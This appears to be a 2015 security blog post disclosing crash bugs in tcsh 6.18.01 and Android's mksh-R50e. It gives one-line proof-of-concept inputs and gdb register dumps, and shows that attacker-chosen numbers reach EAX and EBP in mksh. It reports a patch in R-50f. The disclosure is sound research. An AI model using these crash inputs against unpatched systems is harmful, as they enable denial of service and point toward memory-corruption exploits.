Friday 3 April 2015

Crashing Shells

A quick post about two crashes i found in tcsh (default FreeBSD shell, however the BSD version does not segfault) and mksh (default shell on Android). As i'm not planning to research it further, i will just leave it here. Maybe someone will figure out if any of this can be exploited somehow.

tcsh:
1. Affected version
 tcsh 6.18.01 and maybe older. FreeBSD version handled it just fine.

3. PoC
$ perl -e 'print "\$?:\x80"' | tcsh

Program received signal SIGSEGV, Segmentation fault.
0x080d827a in xputchar (c=8388738) at sh.print.c:156
156 if(iscntrl(c) && (ASC(c) < 0x80 || MB_CUR_MAX == 1)) {
(gdb) x/i $eip
=> 0x80d827a : movzwl (%eax,%ebx,2),%edx
Where the last byte marked with red color can be anything > 0x79 to trigger the crash.

Android shell / mksh:

1. Affected version
mksh-R50e and maybe older. Tested on latest source version and a Nexus with Android 5.0.1

2. PoC

D:\Android\sdk\platform-tools>adb shell # run shell
shell@mako:/ $ cd sdcard # must be a dir that is not read-only
cd sdcard
shell@mako:/sdcard $ 4444444444444>4 # actual input that causes the crash
4444444444444>4

D:\Android\sdk\platform-tools> # our shell died 


It seems to crash at exec.c:1415 in function iosetup() if (e->savefd[iop->unit] == 0) {

update:
by manipulating the first part of the expression we can control EAX and EBP value:
e.g.
$ 10947955850>1

Program received signal SIGSEGV, Segmentation fault.
0x80009c92 in ?? ()
(gdb) i r
eax            0x8c8c8c8a       -1936946038
ecx            0x3      3
edx            0x0      0
ebx            0x8003be50       -2147238320
esp            0xbffff210       0xbffff210
ebp            0x991da068       0x991da068
esi            0x80044a54       -2147202476
edi            0x2      2
eip            0x80009c92       0x80009c92
eflags         0x10206  [ PF IF RF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
$ 1000200887800>1
Program received signal SIGSEGV, Segmentation fault.
0x80009c92 in ?? ()
(gdb) i r
eax            0xe09e5df8       -526492168
ecx            0x3      3
edx            0x0      0
ebx            0x8003be50       -2147238320
esp            0xbffff210       0xbffff210
ebp            0x41414344       0x41414344
esi            0x80044a54       -2147202476
edi            0x2      2
eip            0x80009c92       0x80009c92
eflags         0x10206  [ PF IF RF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) bt
#0  0x80009c92 in ?? ()
Backtrace stopped: Cannot access memory at address 0x41414348
The bug has been patched in the latest R-50f release.
Bug report can be seen here and the fix here.